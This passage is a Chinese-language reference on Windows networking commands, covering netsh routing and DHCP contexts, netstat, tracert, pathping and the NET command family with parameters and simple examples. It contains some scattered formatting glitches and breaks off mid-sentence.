offline - 将当前模式设置成脱机。 online - 将当前模式设置成联机。 popd - 从堆栈上打开一个上下文。 pushd - 将当前上下文放推入堆栈。 quit - 退出程序。

ras - 更改到 `ras' 上下文。

routing - 更改到 `routing' 上下文。 set - 更新配置设置。 show - 显示信息

unalias - 删除一个别名。

wins - 更改到 `wins' 上下文。

下列的子上下文可用:

routing interface ras dhcp wins aaaa

若需要命令的更多帮助信息，请键入命令,后面跟 ?。

每一个子命令下面还有很多子命令。这里就不一一介绍了因为实在是功能太多了，大家可以自己研究一下。

使用 netstat 显示连接统计

可以使用 netstat 命令显示协议统计信息和当前的 TCP/IP 连接。netstat -a 命令将显示所有连接，而 netstat -r 显示路由表和活动连接。netstat -e 命令将显示 Ethernet 统计信息，而 netstat -s 显示每个协议的统计信息。如果使用 netstat -n，则不能将地址和端口号转换成名称。 Tracert（跟踪路由）是路由跟踪实用程序，用于确定 IP 数据报访问目标所采取的路径。Tracert 命令用 IP 生存时间 (TTL) 字段和 ICMP 错误消息来确定从一个主机到网络上其他主机的路由。

-d 指定不将IP 地址解析到主机名称。

-h maximum_hops 指定跃点数以跟踪到称为 target_name 的主机的路由。 -j host-list 指定 Tracert 实用程序数据包所采用路径中的路由器接口列表。 -w timeout 等待 timeout 为每次回复所指定的毫秒数。 target_name 目标主机的名称或 IP 地址。

pathping 命令是一个路由跟踪工具，它将 ping 和 tracert 命令的功能和这两个工具所不提供的其他信息结合起来。pathping 命令在一段时间内将数据包发送到到达最终目标的路径上的每个路由器，然后基于数据包的计算机结果从每个跃点返回。由于命令显示数据包在任何给定路由器或链接上丢失的程度，因此可以很容易地确定可能导致网络问题的路由器或链接。

-n Hostnames 不将地址解析成主机名。 -h Maximum hops 搜索目标的最大跃点数。 -g Host-list 沿着路由列表释放源路由。 -p Period 在 ping 之间等待的毫秒数。 -q Num_queries 每个跃点的查询数。

-w Time-out 为每次回复所等待的毫秒数。

-T Layer 2 tag 将第 2 层优先级标记（例如，对于 IEEE 802.1p）连接到数据包并将它发送到路径中的每个网络设备。这有助于标识没有正确配置第 2 层优先级的网络设备。-T 开关用于测试服务质量 (QoS) 连通性。

-R RSVP test Che 检查以确定路径中的每个路由器是否支持“资源保留协议 (RSVP)”，此协议允许主机为数据流保留一定量的带宽。 -R 开关用于测试服务质量 (QoS) 连通性。 在命令提示符下交互使用 DHCP 命令 打开 命令提示符。 键入 netsh。

在 netsh>(Netshell) 命令提示行键入“dhcp”。 在 dhcp>（DHCP 辅助程序）命令提示行，为您要管理的服务器键入 server \\\\servername 或 server ip_address。

一旦您有权管理的服务器已成功连接，则会看到“您可以对服务器 servername 进行读写访问”

一旦连接成功，您就可以使用用于 DHCP 的任何支持的 Netshell 命令。 键入 /? 或 help 来显示直接的 DHCP 子命令菜单或作为选项显示，键入 list 列出可与 DHCP 一起使用的所有 Netshell 子命令。 route 的命令

routing ip add/delete/set/show interface 在指定接口上添加、删除、配置或显示常规 IP 路由设置。

routing ip add/delete/set/show filter 在指定接口上添加、删除、配置或显示 IP 数据包筛选器。

routing ip add/delete/show boundary 在指定接口上添加、删除或显示多播边界设置。 routing ip add/set ipiptunnel 添加或配置 IP 中的 IP 接口。

routing ip add/delete/set/show rtmroute 添加、配置或显示不持续的路由表管理器路由。 routing ip add/delete/set/show persistentroute 添加、删除、配置或显示持续路由。

routing ip add/delete/set/show preferenceforprotocol 添加、删除、配置或显示路由协议的优先级。

routing ip add/delete/set/show scope 添加、删除或显示多播作用域。 routing ip set/show loglevel 配置或显示全局 IP 记录等级。

routing ip show helper 显示 IP 的所有 Netsh 实用程序子环境。 routing ip show protocol 显示所有正在运行的 IP 路由协议。 routing ip show mfe 显示多播转发项。

routing ip show mfestats 显示多播转发项统计。 routing ip show boundarystats 显示 IP 多播边界。

routing ip show rtmdestinations 显示路由表管理器路由表中的目标。 routing ip show rtmroutes 显示路由表管理器路由表中的路由。

routing ip nat set/show global 配置或显示全局网络地址转换 (NAT) 设置。

routing ip nat add/delete/set/show interface 添加、删除、配置或显示指定接口的 NAT 设置。

routing ip nat add/delete addressrange 在 NAT 接口公用地址池中添加或删除一个地址范围。

routing ip nat add/delete addressmapping 添加或删除 NAT 地址映射。 routing ip nat add/delete portmapping 添加或删除 NAT 端口映射。

routing ip autodhcp set/show global 配置或显示全局 DHCP 分配器参数。

routing ip autodhcp set/show interface 配置或显示指定接口的 DHCP 分配器设置。 routing ip autodhcp add/delete exclusion 在 DHCP 分配器地址范围中添加或删除一个排除范围。

routing ip dnsproxy set/show global 配置或显示全局 DNS 代理参数。

routing ip dnsproxy set/show interface 配置或显示指定接口的 DNS 代理参数。 routing ip igmp set/show global 配置或显示 IGMP 全局设置。

routing ip igmp add/delete/set/show interface 在指定接口上添加、删除、配置或显示 IGMP。

routing ip igmp add/delete staticgroup 添加或删除指定接口的静态多播组。 routing ip igmp show grouptable 显示 IGMP 主机组表。 routing ip igmp show ifstats 显示每个接口的 IGMP 统计。 routing ip igmp show iftable 显示每个接口的 IGMP 主机组。

routing ip igmp show proxygrouptable 显示 IGMP 代理接口的 IGMP 组表。

routing ip igmp show rasgrouptable 显示远程访问服务器所使用的 Internet 接口的组表。 routing ip ospf set/show global 配置或显示全局 OSPF 设置。

routing ip ospf add/delete/set/show interface 在指定接口上添加、删除、配置或显示 OSPF。

routing ip ospf add/delete/set/show area 添加、删除、配置或显示 OSPF 区域。 routing ip ospf add/delete/show range 在指定的 OSPF 区域上添加、删除、配置或显示范围。

routing ip ospf add/delete/set/show virtif 添加、删除、配置或显示 OSPF 虚拟接口。 routing ip ospf add/delete/show neighbor 添加、删除、配置或显示 OSPF 邻居。

routing ip ospf add/delete/show protofilter 添加、删除、配置或显示 OSPF 外部路由的路由信息源。

routing ip ospf add/delete/show routefilter 添加、删除、配置或显示 OSPF 外部路由的路由筛选。

routing ip ospf show areastats 显示 OSPF 区域统计。 routing ip ospf show b 显示 OSPF 链接状态数据库。

routing ip ospf show virtifstats 显示 OSPF 虚拟链接统计。

routing ip relay set global 配置“DHCP 中继代理程序”的全局设置。

routing ip relay add/delete/set interface 在指定接口上添加、删除或配置“DHCP 中继代理程序”设置。

routing ip relay add/delete dhcpserver 在 DHCP 服务器地址列表中添加或删除 DHCP 服务器的 IP 地址。

routing ip relay show ifbinding 显示接口的 IP 地址绑定。

routing ip relay show ifconfig 显示每个接口的“DHCP 中继代理程序”配置。 routing ip relay show ifstats 显示每个接口的 DHCP 统计。 routing ip rip set/show global 配置 IP 的 RIP 全局设置。

routing ip rip add/delete/set/show interface 在指定接口上添加或配置 IP 的 RIP 设置。 routing ip rip add/delete peerfilter 添加或删除 RIP 对等筛选器。

routing ip rip add/delete acceptfilter 在接受的路由列表中添加或删除 RIP 路由筛选器。 routing ip rip add/delete announcefilter 在公布的路由列表中添加或删除 RIP 路由筛选器。

routing ip rip add/delete/show neighbor 添加或删除 RIP 邻居。

routing ip rip set/show flags 在指定接口上配置 IP RIP 高级设置。 routing ip rip show globalstats 显示全局 RIP 参数。 routing ip rip show ifbinding 显示接口的 IP 地址绑定。 routing ip rip show ifstats 显示每个接口的 RIP 统计。 IPX netsh 路由命令

routing ipx add/set staticroute 在 IPX 路由表中添加或配置静态 IPX 路由。 routing ipx add/set staticservice 在 SAP 服务表中添加或配置静态 SAP 服务。 routing ipx add/set filter 在指定的接口上添加或配置 IPX 数据包筛选器。

routing ipx add/set interface 在请求拨号接口上启用 IPX 路由，或在指定的接口上配置 IPX 设置。

routing ipx set global 配置全局 IPX 路由设置。

routing ipx rip add/set filter 添加和配置 RIP 路由筛选器。 routing ipx rip set global 配置全局 IPX 的 RIP 设置。

routing ipx rip set interface 在指定接口上配置 IPX 的 RIP 设置。 routing ipx sap add/set filter 添加或配置 SAP 服务筛选器。 routing ipx sap set global 配置全局 IPX 的 SAP 设置。

routing ipx sap set interface 在指定接口上配置 IPX 的 SAP 设置。 routing ipx netbios add nbname 将静态 NETBIOS 名称添加

Windows NT(2000)中的net命令 NET命令是Windows NT中的一个功能强大的工具。虽然必须用命令行方式执行，但它的功能确覆盖了W indows NT中大部分重要的管理功能。例如，它可以管理网络环境、各种服务程序的运行和配置、进行用户和登陆管理等。它还可以查看服务器的许多本地信息。Windows98中也包含NET命令，但其功能比在NT中少得多。

可以通过以下两种方法获得NET命令的帮助信息：

(1)在NT下可以用图形的方式，通过开始菜单>帮助>索引，然后输入NET。

(2)也可以在命令行方式下输入NET/?或NET或NET HELP得到它的功能(COMMAND)列表，然后通过NET COMMAND/HELP或NET HELP COMMAND或NET COMMAND/?命令得到相应功能的帮助信息。在使用NET命令时需要注意的是：它的有一些命令是会马上产生作用并永久保存的，使用的时候要慎重。下面对NET命令的不同参数的基本用法做一些初步的介绍：

1. NET VIEW

作用：显示域列表、计算机列表或指定计算机的共享资源列表。

命令格式：net view [\\\\computername|/domain[:domainname>

参数介绍：(1)键入不带参数的net view显示当前域的计算机列表。

(2)\\\\computername指定要查看其共享资源的计算机。

(3)/domain[:domainname]指定要查看其可用计算机的域。举例说明：(1)net view \\\\XIAOHU查看XIAOHU的共享资源列表。

(4)net view/domain:MYDOMAIN查看MYDOMAIN域中的机器列表。

2. NET USER

作用：添加或更改用户帐号或显示用户帐号信息。该命令也可以写为 net users。

命令格式：net user [username [password|*] [options> [/d omain]

参数介绍：(1)键入不带参数的net user查看计算机上的用户帐号列表。

(2)username添加、删除、更改或查看用户帐号名。

(3)password为用户帐号分配或更改密码。

(4)*提示输入密码。

(5)/domain在计算机主域的主域控制器中执行操作。举例说明：(1)net user xiaohu查看用户XIAOHU的信息。

3. NET USE

作用：连接计算机或断开计算机与共享资源的连接，或显示计算机的连接信息。

命令格式：net use [devicename|*] [\\\\computername\\sharena me[\\volume> [password|*> [/user:[domainname\\]username ]

参数介绍：(1)键入不带参数的net use列出网络连接。

(2)devicename指定要连接到的资源名称或要断开的设备名称。

(3)\\\\computername\\sharename服务器及共享资源的名称。

(4)password访问共享资源的密码。

(5)*提示键入密码。

(6)/user指定进行连接的另外一个用户。

(7)domainname指定另一个域。

(8)username指定登录的用名。 (9)/home将用户连接到其宿主目录。

(10)/delete取消指定网络连接。

(11)/persistent控制永久网络连接的使用。举例说明：

(1)net use e: \\\\XIAOHU\\TEMP将\\\\XIAOHU\\TEMP目录建立为E盘。

(2)net use e: \\\\XIAOHU\\TEMP/delete断开连接。

4. NET TIME

作用：使计算机的时钟与另一台计算机或域的时间同步。

命令格式：net time [\\\\computername|/domain[:name> [/set ]

参数介绍：

(1)\\\\computername要检查或同步的服务器名。

(2)/domain[:name]指定要与其时间同步的域。

(3)/set使本计算机时钟与指定计算机或域的时钟同步。

下面的这4个参数是相关的，所以一起介绍：

5. Net Start

作用：启动服务，或显示已启动服务的列表。

命令格式：net start service

6. Net Pause

作用：暂停正在运行的服务。

命令格式：net pause service

7. Net Continue

作用：重新激活挂起的服务。

命令格式：net continue service

8. NET STOP

作用：停止 Windows NT网络服务。

命令格式：net stop service

参数介绍：

(1)alerter(警报)

(2)client service for netware(Netware客户端服务)

(3)clipbook server(剪贴簿服务器)

(4)computer browser(计算机浏览器)

(5)directory replicator(目录复制器)

(6)ftp publishing service(ftp)(ftp发行服务)

(7)lpdsvc

(8)net logon(网络登录)

(9)network dde(网络 dde)

(10)network dde dsdm(网络 dde dsdm)

(11)network monitor agent(网络监控代理)

(12)nt lm security support provider(NT LM安全性支持提供)

(13)ole(对象链接与嵌入)

(14)remote access connection manager(远程访问连接管理器)

(15)remote access isnsap service(远程访问 isnsap服务)

(16)remote access server(远程访问服务器)

(17)remote procedure call(rpc) locator(远程过程调用定位器)

(18)remote procedure call(rpc) service(远程过程调用服务)

(19)schedule(调度)

(20)server(服务器)

(21)simple tcp/ip services(简单 TCP/IP服务)

(22)snmp

(23)spooler(后台打印程序)

(24)tcp/ip netbios helper(TCP/IP NETBIOS辅助工具)

(25)ups

(26)workstation(工作站)

(27)messenger(信使)

(28)dhcp client

(29)eventlog

9. Net Statistics

作用：显示本地工作站或服务器服务的统计记录。

命令格式：net statistics [workstation| server]

参数介绍：(1)键入不带参数的net statistics列出其统计信息可用的运行服务。

(2)workstation显示本地工作站服务的统计信息。

(3)server显示本地服务器服务的统计信息。举例说明：net statistics server| more显示服务器服务的统计信息。

10. Net Share

作用：创建、删除或显示共享资源。

命令格式：net share share name=drive:path [/users:number |/unlimited] [/remark:\"text\"]

参数介绍：(1)键入不带参数的net share显示本地计算机上所有共享资源的信息。

(2)sharename是共享资源的网络名称。

(3)drive:path指定共享目录的绝对路径。

(4)/users:number设置可同时访问共享资源的最大用户数。

(5)/unlimited不同时访问共享资源的用户数。

(6)/remark:\"text\"添加关于资源的注释，注释文字用引号引住。举例说明：(1)net share mymydomain=c:\emp/remark:\"my fir st share\"以mymydomain为共享名共享C:\emp。

(7)net share mymydomain/delete停止共享mymydomain目录。

11. Net Session

作用：列出或断开本地计算机和与之连接的客户端的会话，也可以写为net sessions或net ses s。

命令格式：net session [\\\\computername] [/delete]

参数介绍：(1)键入不带参数的net session显示所有与本地计算机的会话的信息。

(2)\\\\computername标识要列出或断开会话的计算机。举例说明： net session \\\\XIAOHU要显示计算机名为XIAOHU的客户端会话信息列表。

12. Net Send

作用：向网络的其他用户、计算机或通信名发送消息。

命令格式：net send{name|*|/domain[:name]|/users} message

参数介绍：(1)name要接收发送消息的用户名、计算机名或通信名。

(2)*将消息发送到组中所有名称。

(3)/domain[:name]将消息发送到计算机域中的所有名称。

(4)/users将消息发送到与服务器连接的所有用户。

(5)message作为消息发送的文本。举例说明：(1)net send/users server will shutdown in5 min utes给所有连接到服务器的用户发送关机消息。

13. Net Print

作用：显示或控制打印作业及打印队列。

命令格式：net print [\\\\computername ] job# [/hold|/relea se|/delete]

参数介绍：(1)computername共享打印机队列的计算机名。

(2)sharename打印队列名称。

(3)job#在打印机队列中分配给打印作业的标识号。

(4)/hold使用 job#时，在打印机队列中使打印作业等待。

(5)/release释放保留的打印作业。

(6)/delete从打印机队列中删除打印作业。举例说明：(1)net print \\\\XIAOHU\\SEEME列出\\\\XIAOHU计算机上SEEME 打印机队列的目